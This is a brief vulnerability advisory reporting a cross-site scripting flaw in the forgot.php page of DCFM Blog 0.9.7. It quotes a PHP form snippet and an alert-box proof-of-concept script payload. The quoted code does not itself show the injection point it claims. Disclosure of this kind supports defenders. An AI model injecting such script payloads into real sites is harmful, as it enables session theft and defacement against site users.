DCFM Blog 0.9.7 XSS Attack
===========================




Discovered by N_A , N_A[at]tutanota.com
========================================


Description
============

Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible.

https://sourceforge.net/projects/dcfm-blog/






Vulnerability
=============


The forgot.php file in DCFM Blog 0.9.7 does not proplery check input and code injection is possible.


if (!isset($_POST['userf'])) {
	echo "<form action='forgot.php' method='post'>
	Please provide your username:
	<input type='text' name='userf' />
	<br /><br /><input type='submit' value='Get my Password' />
</form>";






Proof Of Concept String
========================


<script>alert('XSS');</script>





Email
=====

N_A[at]tutanota.com